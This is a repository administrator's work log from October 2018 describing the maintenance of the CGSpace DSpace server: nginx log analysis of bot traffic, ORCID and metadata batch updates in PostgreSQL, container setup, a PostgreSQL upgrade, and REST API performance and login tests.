2018-10-01

+
    +
  • Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
  • +
  • I created a GitHub issue to track this #389, because I’m super busy in Nairobi right now
  • +
+

2018-10-03

+
    +
  • I see Moayad was busy collecting item views and downloads from CGSpace yesterday:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    933 40.77.167.90
+    971 95.108.181.88
+   1043 41.204.190.40
+   1454 157.55.39.54
+   1538 207.46.13.69
+   1719 66.249.64.61
+   2048 50.116.102.77
+   4639 66.249.64.59
+   4736 35.237.175.180
+ 150362 34.218.226.147
+
    +
  • Of those, about 20% were HTTP 500 responses (!):
  • +
+
$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Oct/2018" | grep 34.218.226.147 | awk '{print $9}' | sort -n | uniq -c
+ 118927 200
+  31435 500
+
    +
  • I added Phil Thornton and Sonal Henson’s ORCID identifiers to the controlled vocabulary for cg.creator.orcid and then re-generated the names using my resolve-orcids.py script:
  • +
+
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq > 2018-10-03-orcids.txt
+$ ./resolve-orcids.py -i 2018-10-03-orcids.txt -o 2018-10-03-names.txt -d
+
    +
  • I found a new corner case error that I need to check, given and family names deactivated:
  • +
+
Looking up the names associated with ORCID iD: 0000-0001-7930-5752
+Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
+
    +
  • It appears to be Jim Lorenzen… I need to check that later!
  • +
  • I merged the changes to the 5_x-prod branch (#390)
  • +
  • Linode sent another alert about CPU usage on CGSpace (linode18) this evening
  • +
  • It seems that Moayad is making quite a lot of requests today:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Oct/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+   1594 157.55.39.160
+   1627 157.55.39.173
+   1774 136.243.6.84
+   4228 35.237.175.180
+   4497 70.32.83.92
+   4856 66.249.64.59
+   7120 50.116.102.77
+  12518 138.201.49.199
+  87646 34.218.226.147
+ 111729 213.139.53.62
+
    +
  • But in super positive news, he says they are using my new dspace-statistics-api and it’s MUCH faster than using Atmire CUA’s internal “restlet” API
  • +
  • I don’t recognize the 138.201.49.199 IP, but it is in Germany (Hetzner) and appears to be paginating over some browse pages and downloading bitstreams:
  • +
+
# grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /[a-z]+' | sort | uniq -c
+   8324 GET /bitstream
+   4193 GET /handle
+
    +
  • Suspiciously, it’s only grabbing the CGIAR System Office community (handle prefix 10947):
  • +
+
# grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /handle/[0-9]{5}' | sort | uniq -c
+      7 GET /handle/10568
+   4186 GET /handle/10947
+
    +
  • The user agent is suspicious too:
  • +
+
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+
    +
  • It’s clearly a bot and it’s not re-using its Tomcat session, so I will add its IP to the nginx bad bot list
  • +
  • I looked in Solr’s statistics core and these hits were actually all counted as isBot:false (of course)… hmmm
  • +
  • I tagged all of Sonal and Phil’s items with their ORCID identifiers on CGSpace using my add-orcid-identifiers-csv.py script:
  • +
+
$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • Where 2018-10-03-add-orcids.csv contained:
  • +
+
dc.contributor.author,cg.creator.id
+"Henson, Sonal P.",Sonal Henson: 0000-0002-2002-5462
+"Henson, S.",Sonal Henson: 0000-0002-2002-5462
+"Thornton, P.K.",Philip Thornton: 0000-0002-1854-0182
+"Thornton, Philip K",Philip Thornton: 0000-0002-1854-0182
+"Thornton, Phil",Philip Thornton: 0000-0002-1854-0182
+"Thornton, Philip K.",Philip Thornton: 0000-0002-1854-0182
+"Thornton, Phillip",Philip Thornton: 0000-0002-1854-0182
+"Thornton, Phillip K.",Philip Thornton: 0000-0002-1854-0182
+

2018-10-04

+
    +
  • Salem raised an issue that the dspace-statistics-api reports downloads for some items that have no bitstreams (like many limited access items)
  • +
  • Every item has at least a LICENSE bundle, and some have a THUMBNAIL bundle, but the indexing code is specifically checking for downloads from the ORIGINAL bundle
  • +
  • I see there are other bundles we might need to pay attention to: TEXT, @_LOGO-COLLECTION_@, @_LOGO-COMMUNITY_@, etc…
  • +
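  • A handy way to see which bundles an item’s download events are actually attributed to is to facet on bundleName (a hedged example using the item ID from the earlier Solr experiments):

$ http 'http://localhost:8081/solr/statistics/select?q=type:0+owningItem:11576&fq=isBot:false&fq=statistics_type:view&rows=0&facet=true&facet.field=bundleName&wt=json'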
  • On a hunch I dropped the statistics table and re-indexed and now those two items above have no downloads
  • +
  • So it’s fixed, but I’m not sure why!
  • +
  • Peter wants to know the number of API requests per month, which was about 250,000 in September (excluding statlet requests):
  • +
+
# zcat --force /var/log/nginx/{oai,rest}.log* | grep -E 'Sep/2018' | grep -c -v 'statlets'
+251226
+
    +
  • I found a logic error in the dspace-statistics-api indexer.py script that was causing item views to be inserted into downloads
  • +
  • I tagged version 0.4.2 of the tool and redeployed it on CGSpace
  • +
+

2018-10-05

+
    +
  • Meet with Peter, Abenet, and Sisay to discuss CGSpace meeting in Nairobi and Sisay’s work plan
  • +
  • We agreed that he would do monthly updates of the controlled vocabularies and generate a new one for the top 1,000 AGROVOC terms
  • +
  • Add a link to AReS explorer to the CGSpace homepage introduction text
  • +
+

2018-10-06

+
    +
  • Follow up with AgriKnowledge about including Handle links (dc.identifier.uri) on their item pages
  • +
  • In July, 2018 they had said their programmers would include the field in the next update of their website software
  • +
  • CIMMYT’s DSpace repository is now running DSpace 5.x!
  • +
  • It’s running OAI, but not REST, so I need to talk to Richard about that!
  • +
+

2018-10-08

+
    +
  • AgriKnowledge says they’re going to add the dc.identifier.uri to their item view in November when they update their website software
  • +
+

2018-10-10

+
    +
  • Peter noticed that some recently added PDFs don’t have thumbnails
  • +
  • When I tried to force them to be generated I got an error that I’ve never seen before:
  • +
+
$ dspace filter-media -v -f -i 10568/97613
+org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf' @ error/constitute.c/ReadImage/412.
+
    +
  • I see there was an update to Ubuntu’s ImageMagick on 2018-10-05, so maybe something changed or broke?
  • +
  • I get the same error when forcing filter-media to run on DSpace Test too, so it’s gotta be an ImageMagic bug
  • +
  • The ImageMagick version is currently 8:6.8.9.9-7ubuntu5.13, and there is an Ubuntu Security Notice from 2018-10-04
  • +
  • Wow, someone on Twitter posted about this breaking his web application (and it was retweeted by the ImageMagick account!)
  • +
  • I commented out the line that disables PDF thumbnails in /etc/ImageMagick-6/policy.xml:
  • +
+
  <!--<policy domain="coder" rights="none" pattern="PDF" />-->
+
    +
  • This works, but I’m not sure what ImageMagick’s long-term plan is if they are going to disable ALL image formats…
  • +
  • I suppose I need to enable a workaround for this in Ansible?
  • +
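  • A quick sketch of that workaround as a shell one-liner (an Ansible task would do the equivalent edit to the policy file):

$ sudo sed -i 's|<policy domain="coder" rights="none" pattern="PDF" />|<!--<policy domain="coder" rights="none" pattern="PDF" />-->|' /etc/ImageMagick-6/policy.xml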
+

2018-10-11

+
    +
  • I emailed DuraSpace to update our entry in their DSpace registry (the data was still on DSpace 3, JSPUI, etc)
  • +
  • Generate a list of the top 1500 values for dc.subject so Sisay can start making a controlled vocabulary for it:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-10-11-top-1500-subject.csv WITH CSV HEADER;
+COPY 1500
+
    +
  • Give WorldFish advice about Handles because they are talking to some company called KnowledgeArc who recommends they do not use Handles!
  • +
  • Last week I emailed Altmetric to ask if their software would notice mentions of our Handle in the format “handle:10568/80775” because I noticed that the Land Portal does this
  • +
  • Altmetric support responded to say no, but the reason is that Land Portal is doing even more strange stuff by not using <meta> tags in their page header, and using “dct:identifier” property instead of “dc:identifier”
  • +
  • I re-created my local DSpace database container using podman instead of Docker:
  • +
+
$ mkdir -p ~/.local/lib/containers/volumes/dspacedb_data
+$ sudo podman create --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ sudo podman start dspacedb
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+
    +
  • I tried to make an Artifactory in podman, but it seems to have problems because Artifactory is distributed on the Bintray repository
  • +
  • I can pull the docker.bintray.io/jfrog/artifactory-oss:latest image, but not start it
  • +
  • I decided to use a Sonatype Nexus repository instead:
  • +
+
$ mkdir -p ~/.local/lib/containers/volumes/nexus_data
+$ sudo podman run --name nexus -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
+
    +
  • With a few changes to my local Maven settings.xml it is working well
  • +
  • Generate a list of the top 10,000 authors for Peter Ballantyne to look through:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 3 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 10000) to /tmp/2018-10-11-top-10000-authors.csv WITH CSV HEADER;
+COPY 10000
+
    +
  • CTA uploaded some infographics that are very tall and their thumbnails disrupt the item lists on the front page and in their communities and collections
  • +
  • I decided to constrain the max height of these to 200px using CSS (#392)
  • +
+

2018-10-13

+
    +
  • Run all system updates on DSpace Test (linode19) and reboot it
  • +
  • Look through Peter’s list of 746 author corrections in OpenRefine
  • +
  • I first facet by blank, trim whitespace, and then check for weird characters that might be indicative of encoding issues with this GREL:
  • +
+
or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/))
+)
+
    +
  • Then I exported and applied them on my local test server:
  • +
+
$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t CORRECT -m 3
+
    +
  • I will apply these on CGSpace when I do the other updates tomorrow, as well as double check the high scoring ones to see if they are correct in Sisay’s author controlled vocabulary
  • +
+

2018-10-14

+
    +
  • Merge the authors controlled vocabulary (#393), usage rights (#394), and the upstream DSpace 5.x cherry-picks (#394) into our 5_x-prod branch
  • +
  • Switch to new CGIAR LDAP server on CGSpace, as it’s been running (at least for authentication) on DSpace Test for the last few weeks, and I think the old one will be deprecated soon (today?)
  • +
  • Apply Peter’s 746 author corrections on CGSpace and DSpace Test using my fix-metadata-values.py script:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p 'fuuu'
+
    +
  • Run all system updates on CGSpace (linode19) and reboot the server
  • +
  • After rebooting the server I noticed that Handles are not resolving, and the dspace-handle-server systemd service is not running (or rather, it exited with success)
  • +
  • Restarting the service with systemd works for a few seconds, then the java process quits
  • +
  • I suspect that the systemd service type needs to be forking rather than simple, because the service calls the default DSpace start-handle-server shell script, which uses nohup and & to background the java process (see the sketch after this list)
  • +
  • It would be nice if there was a cleaner way to start the service and then just log to the systemd journal rather than all this hiding and log redirecting
  • +
  • Email the Landportal.org people to ask if they would consider Dublin Core metadata tags in their page’s header, rather than the HTML properties they are using in their body
  • +
  • Peter pointed out that some thumbnails were still not getting generated +
      +
    • When I tried to generate them manually I noticed that the path to the CMYK profile had changed because Ubuntu upgraded Ghostscript from 9.18 to 9.25 last week… WTF?
    • +
    • Looks like I can use /usr/share/ghostscript/current instead of /usr/share/ghostscript/9.25
    • +
    +
  • +
  • I limited the tall thumbnails even further to 170px because Peter said CTA’s were still too tall at 200px (#396)
  • +
+
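  • For reference, a minimal sketch of the kind of systemd drop-in that might address the Handle server issue, assuming the unit is called dspace-handle-server.service and wraps the stock start-handle-server script (the unit name, paths, and PID file are assumptions, not our actual configuration):

# /etc/systemd/system/dspace-handle-server.service.d/override.conf (hypothetical)
[Service]
# "forking" matches a start script that backgrounds java with nohup and &
Type=forking
# systemd still needs a way to track the backgrounded java process, for example a
# PID file (whether start-handle-server writes one is an assumption here)
#PIDFile=/home/dspace/handle-server/handle-server.pid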

2018-10-15

+
    +
  • Tomcat on DSpace Test (linode19) has somehow stopped running all the DSpace applications
  • +
  • I don’t see anything in the Catalina logs or dmesg, and the Tomcat manager shows XMLUI, REST, OAI, etc all “Running: false”
  • +
  • Actually, now I remember that yesterday when I deployed the latest changes from git on DSpace Test I noticed a syntax error in one XML file when I was doing the discovery reindexing
  • +
  • I fixed it so that I could reindex, but I guess the rest of DSpace actually didn’t start up…
  • +
  • Create an account on DSpace Test for Felix from Earlham so he can test COPO submission +
      +
    • I created a new collection and added him as the administrator so he can test submission
    • +
    • He said he actually wants to test creation of communities, collections, etc, so I had to make him a super admin for now
    • +
    • I told him we need to think about the workflow more seriously in the future
    • +
    +
  • +
  • I ended up having some issues with podman and went back to Docker, so I had to re-create my containers:
  • +
+
$ sudo docker run --name nexus --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus_data -p 8081:8081 sonatype/nexus3
+$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
+

2018-10-16

+
    +
  • Generate a list of the schema on CGSpace so CodeObia can compare with MELSpace:
  • +
+
dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN 'dc' WHEN metadata_schema_id=2 THEN 'cg' END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
+
    +
  • Talking to the CodeObia guys about the REST API I started to wonder why it’s so slow and how I can quantify it in order to ask the dspace-tech mailing list for help profiling it
  • +
  • Interestingly, the speed doesn’t get better after you request the same thing multiple times–it’s consistently bad on both CGSpace and DSpace Test!
  • +
+
$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
+...
+0.35s user 0.06s system 1% cpu 25.133 total
+0.31s user 0.04s system 1% cpu 25.223 total
+0.27s user 0.06s system 1% cpu 27.858 total
+0.20s user 0.05s system 1% cpu 23.838 total
+0.30s user 0.05s system 1% cpu 24.301 total
+
+$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
+...
+0.22s user 0.03s system 1% cpu 17.248 total
+0.23s user 0.02s system 1% cpu 16.856 total
+0.23s user 0.04s system 1% cpu 16.460 total
+0.24s user 0.04s system 1% cpu 21.043 total
+0.22s user 0.04s system 1% cpu 17.132 total
+
    +
  • I should note that at this time CGSpace is using Oracle Java and DSpace Test is using OpenJDK (both version 8)
  • +
  • I wonder if the Java garbage collector is important here, or if there are missing indexes in PostgreSQL?
  • +
  • I switched DSpace Test to the G1GC garbage collector and tried again and now the results are worse!
  • +
+
$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
+...
+0.20s user 0.03s system 0% cpu 25.017 total
+0.23s user 0.02s system 1% cpu 23.299 total
+0.24s user 0.02s system 1% cpu 22.496 total
+0.22s user 0.03s system 1% cpu 22.720 total
+0.23s user 0.03s system 1% cpu 22.632 total
+
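  • Switching the collector is just a change to Tomcat's JAVA_OPTS; roughly something like this, where everything other than -XX:+UseG1GC (heap sizes, encoding, headless flags) is a placeholder rather than our actual Tomcat options:

JAVA_OPTS="-Djava.awt.headless=true -Xms2g -Xmx2g -XX:+UseG1GC -Dfile.encoding=UTF-8"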
    +
  • If I make a request without the expands it is ten times faster:
  • +
+
$ time http --print h 'https://dspacetest.cgiar.org/rest/items?limit=100&offset=0'
+...
+0.20s user 0.03s system 7% cpu 3.098 total
+0.22s user 0.03s system 8% cpu 2.896 total
+0.21s user 0.05s system 9% cpu 2.787 total
+0.23s user 0.02s system 8% cpu 2.896 total
+
    +
  • I sent a mail to dspace-tech to ask how to profile this…
  • +
+

2018-10-17

+
    +
  • I decided to update most of the existing metadata values that we have in dc.rights on CGSpace to be machine readable in SPDX format (with Creative Commons version if it was included)
  • +
  • Most of them are from Bioversity, and I asked Maria for permission before updating them
  • +
  • I manually went through and looked at the existing values and updated them in several batches:
  • +
+
UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%CC BY %';
+UPDATE metadatavalue SET text_value='CC-BY-NC-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-ND%' AND text_value LIKE '%by-nc-nd%';
+UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-SA%' AND text_value LIKE '%by-nc-sa%';
+UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value LIKE '%/by/%';
+UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%/by/%' AND text_value NOT LIKE '%zero%';
+UPDATE metadatavalue SET text_value='CC-BY-NC-2.5' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%2.5%';
+UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%4.0%';
+UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%zero%';
+UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution-NonCommercial-ShareAlike%';
+UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
+UPDATE metadatavalue SET text_value='CC-BY-NC-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
+UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution %';
+UPDATE metadatavalue SET text_value='CC-BY-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
+UPDATE metadatavalue SET text_value='CC-BY' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value NOT LIKE '%CC0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%CC-%';
+UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
+
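  • A query like the following (the same pattern as the author and subject counts elsewhere in these notes) is handy for eyeballing what is left in dc.rights between batches like these:

dspace=# SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 GROUP BY text_value ORDER BY count DESC;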
    +
  • I updated the fields on CGSpace and then started a re-index of Discovery
  • +
  • We also need to re-think the dc.rights field in the submission form: we should probably use a popup controlled vocabulary and list the Creative Commons values with version numbers and allow the user to enter their own (like the ORCID identifier field)
  • +
  • Ask Jane if we can use some of the BDP money to host AReS explorer on a more powerful server
  • +
  • IWMI sent me a list of new ORCID identifiers for their staff so I combined them with our list, updated the names with my resolve-orcids.py script, and regenerated the controlled vocabulary:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > 2018-10-17-orcids.txt
+$ ./resolve-orcids.py -i 2018-10-17-orcids.txt -o 2018-10-17-names.txt -d
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • I also decided to add the ORCID identifiers that MEL had sent us a few months ago…
  • +
  • One problem I had with the resolve-orcids.py script is that one user seems to have disabled their profile data since we last updated:
  • +
+
Looking up the names associated with ORCID iD: 0000-0001-7930-5752
+Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
+
    +
  • So I need to handle that situation in the script for sure, but I’m not sure what to do organizationally or ethically, since that user disabled their name! Do we remove him from the list?
  • +
  • I made a pull request and merged the ORCID updates into the 5_x-prod branch (#397)
  • +
  • Improve the logic of name checking in my resolve-orcids.py script
  • +
+

2018-10-18

+
    +
  • I granted MEL’s deposit user admin access to IITA, CIP, Bioversity, and RTB communities on DSpace Test so they can start testing real depositing
  • +
  • After they do some tests and we check the values Enrico will send a formal email to Peter et al to ask that they start depositing officially
  • +
  • I upgraded PostgreSQL to 9.6 on DSpace Test using Ansible, then had to manually migrate from 9.5 to 9.6:
  • +
+
# su - postgres
+$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o ' -c config_file=/etc/postgresql/9.5/main/postgresql.conf' -O ' -c config_file=/etc/postgresql/9.6/main/postgresql.conf'
+$ exit
+# systemctl start postgresql
+# dpkg -r postgresql-9.5 postgresql-client-9.5 postgresql-contrib-9.5
+

2018-10-19

+
    +
  • Help Francesca from Bioversity generate a report about items they uploaded in 2015 through 2018
  • +
  • Linode emailed me to say that CGSpace (linode18) had high CPU usage for a few hours this afternoon
  • +
  • Looking at the nginx logs around that time I see the following IPs making the most requests:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Oct/2018:(12|13|14|15)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    361 207.46.13.179
+    395 181.115.248.74
+    485 66.249.64.93
+    535 157.55.39.213
+    536 157.55.39.99
+    551 34.218.226.147
+    580 157.55.39.173
+   1516 35.237.175.180
+   1629 66.249.64.91
+   1758 5.9.6.51
+
    +
  • 5.9.6.51 is MegaIndex, which I’ve seen before…
  • +
+

2018-10-20

+
    +
  • I was going to try to run Solr in Docker because I learned I can run Docker on Travis-CI (for testing my dspace-statistics-api), but the oldest official Solr images are for 5.5, and DSpace’s Solr configuration is for 4.9
  • +
  • This means our existing Solr configuration doesn’t run in Solr 5.5:
  • +
+
$ sudo docker pull solr:5
+$ sudo docker run --name my_solr -v ~/dspace/solr/statistics/conf:/tmp/conf -d -p 8983:8983 -t solr:5
+$ sudo docker logs my_solr
+...
+ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics] Caused by: solr.IntField
+
    +
  • Apparently a bunch of old field types like solr.IntField were removed in Solr 5
  • +
  • So for now it’s actually a huge pain in the ass to run the tests for my dspace-statistics-api
  • +
  • Linode sent a message that the CPU usage was high on CGSpace (linode18) last night
  • +
  • According to the nginx logs around that time it was 5.9.6.51 (MegaIndex) again:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Oct/2018:(14|15|16)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    249 207.46.13.179
+    250 157.55.39.173
+    301 54.166.207.223
+    303 157.55.39.213
+    310 66.249.64.95
+    362 34.218.226.147
+    381 66.249.64.93
+    415 35.237.175.180
+   1205 66.249.64.91
+   1227 5.9.6.51
+
    +
  • This bot is only using the XMLUI and it does not seem to be re-using its sessions:
  • +
+
# grep -c 5.9.6.51 /var/log/nginx/*.log
+/var/log/nginx/access.log:9323
+/var/log/nginx/error.log:0
+/var/log/nginx/library-access.log:0
+/var/log/nginx/oai.log:0
+/var/log/nginx/rest.log:0
+/var/log/nginx/statistics.log:0
+# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-10-20 | sort | uniq
+8915
+
    +
  • Last month I added “crawl” to the Tomcat Crawler Session Manager Valve’s regular expression matching, and it seems to be working for MegaIndex’s user agent:
  • +
+
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1' User-Agent:'"Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"'
+
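  • For reference, that valve is configured in Tomcat's server.xml; with the extra "crawl" alternative added to the stock crawlerUserAgents pattern it looks roughly like this (a sketch; the exact regex and placement we deploy may differ):

<!-- inside the <Engine> or <Host> element of server.xml (hypothetical placement) -->
<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*crawl.*" />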
    +
  • So I’m not sure why this bot uses so many sessions — is it because it requests very slowly?
  • +
+

2018-10-21

+
    +
  • Discuss AfricaRice joining CGSpace
  • +
+

2018-10-22

+
    +
  • Post message to Yammer about usage rights (dc.rights)
  • +
  • Change build.properties to use HTTPS for Handles in our Ansible infrastructure playbooks
  • +
  • We will still need to do a batch update of the dc.identifier.uri and other fields in the database:
  • +
+
dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
+
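  • Before running it for real, the same WHERE clause can be used to count how many values would be touched (a quick sanity-check sketch):

dspace=# SELECT count(*) FROM metadatavalue WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';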
    +
  • While I was doing that I found two items using CGSpace URLs instead of handles in their dc.identifier.uri so I corrected those
  • +
  • I also found several items that had invalid characters or multiple Handles in some related URL field like cg.link.reference so I corrected those too
  • +
  • Improve the usage rights on the submission form by adding a default selection with no value as well as a better hint to look for the CC license on the publisher page or in the PDF (#398)
  • +
  • I deployed the changes on CGSpace, ran all system updates, and rebooted the server
  • +
  • Also, I updated all Handles in the database to use HTTPS:
  • +
+
dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
+UPDATE 76608
+
    +
  • Skype with Peter about ToRs for the AReS open source work and future plans to develop tools around the DSpace ecosystem
  • +
  • Help CGSpace users with some issues related to usage rights
  • +
+

2018-10-23

+
    +
  • Improve the usage rights (dc.rights) on CGSpace again by adding the long names in the submission form, as well as adding version 3.0 and the Creative Commons Zero (CC0) public domain license (#399)
  • +
  • Add “usage rights” to the XMLUI item display (#400)
  • +
  • I emailed the MARLO guys to ask if they can send us a dump of rights data and Handles from their system so we can tag our older items on CGSpace
  • +
  • Testing REST login and logout via httpie because Felix from Earlham says he’s having issues:
  • +
+
$ http --print b POST 'https://dspacetest.cgiar.org/rest/login' email='testdeposit@cgiar.org' password=deposit
+acef8a4a-41f3-4392-b870-e873790f696b
+
+$ http POST 'https://dspacetest.cgiar.org/rest/logout' rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
+
    +
  • Also works via curl (login, check status, logout, check status):
  • +
+
$ curl -H "Content-Type: application/json" --data '{"email":"testdeposit@cgiar.org", "password":"deposit"}' https://dspacetest.cgiar.org/rest/login
+e09fb5e1-72b0-4811-a2e5-5c1cd78293cc
+$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
+{"okay":true,"authenticated":true,"email":"testdeposit@cgiar.org","fullname":"Test deposit","token":"e09fb5e1-72b0-4811-a2e5-5c1cd78293cc"}
+$ curl -X POST -H "Content-Type: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/logout
